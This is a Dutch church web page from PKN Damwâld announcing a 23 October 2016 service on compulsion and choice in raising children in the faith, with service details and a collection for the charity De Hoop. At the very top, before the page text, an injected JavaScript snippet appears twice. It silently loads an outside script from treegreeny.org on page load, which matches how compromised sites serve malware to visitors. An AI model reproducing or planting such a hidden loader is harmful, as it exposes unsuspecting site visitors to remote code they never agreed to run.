;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 23 oktober 2016 14:00 uur - PKN Damwâld
zondag 23 oktober 2016
14:00 uur

Kerkdienst zondag 23 oktober 2016 14:00 uur

Thema: 'Dwang en keuze'

Het is inmiddels al een tijdje geleden: zondagmiddag 10 april ging de dienst over het thema ‘als je kinderen niet meer gaan’. Na de dienst hebben we toen nog met een groepje mensen nagepraat over het onderwerp. Zondagmiddag 23 oktober wil ik een vervolg maken op dit thema. Ik wil insteken bij de woorden ‘dwang en keuze’. Hoe lang kun je je kinderen eigenlijk verplichten om mee te gaan naar de kerk? Hoe dwingend mag je zijn in de geloofsopvoeding? Of vanuit het perspectief van de kinderen: hoe kom je zover dat je het geloof los kunt gaan zien van de verplichtingen die je vanuit thuis meekreeg? Ik zal mijn best doen om zowel ouders als kinderen het nodige gedachtegoed mee te geven. Ter voorbereiding kunt u misschien eens iets lezen over dit thema. Of zoeken naar verhalen van mensen die geworsteld hebben met een strenge christelijke opvoeding en die daardoor van het geloof zijn vervreemd. Een boek dat ik voor mezelf erg belangrijk vind over dit thema is ‘Overwinteren’ van Gert-Jan Segers. Vast nog wel ergens tweedehands te krijgen – in ieder geval bij mij te leen. Na de dienst is er weer gelegenheid om na te praten.

Bij de dienst … uitreikstuk: dwang-en-keuze-vragen-bij-de-preekvg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Jelte Cuperus
Thema:'Dwang en keuze'
Liturgie
Bij de diensten ... uitreikstuk thema 'dwang en keuze'
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Stichting vrienden van de Hoop

In 1975 voelde een aantal christenen in Dordrecht zich erg betrokken bij het lot van verslaafden in hun samenleving. Gesteund door de plaatselijke kerken besloten zij een opvang voor deze kwetsbare doelgroep op te zetten. Een opvang genaamd: De Hoop. Inmiddels, veertig jaar later, is de opvang uitgegroeid tot een centrum waar op verschillende manieren geestelijke zorg wordt geboden. Een plek waar verslaafden en mensen met psychische problemen professionele hulp krijgen om te herstellen en hun leven weer opnieuw op te bouwen. Alle medewerkers bij De Hoop werken vanuit hun christelijke visie. Het geloof dat in Gods ogen ieder mens waardevol is en dat er voor iedereen genezing en herstel mogelijk is. Bijna 40 jaar na het begin van De Hoop is de steun en het gebed van kerken en vrienden nog even hard nodig. Uw steun, bemoediging en vriendschap zijn dus van harte welkom! De giften worden besteed aan de invulling van identiteit en pastoraat in de behandelingen, de werkervaringbedrijven, het inloophuis, de opvang van moeders met hun kinderen, de christelijke evenementen, de meer dan honderd voorlichtingen en levensverhalen die gedeeld worden via onder andere het blad HOOP en het programma Verhalen van Hoop

Uitganscollecte: Onderhoud gebouwen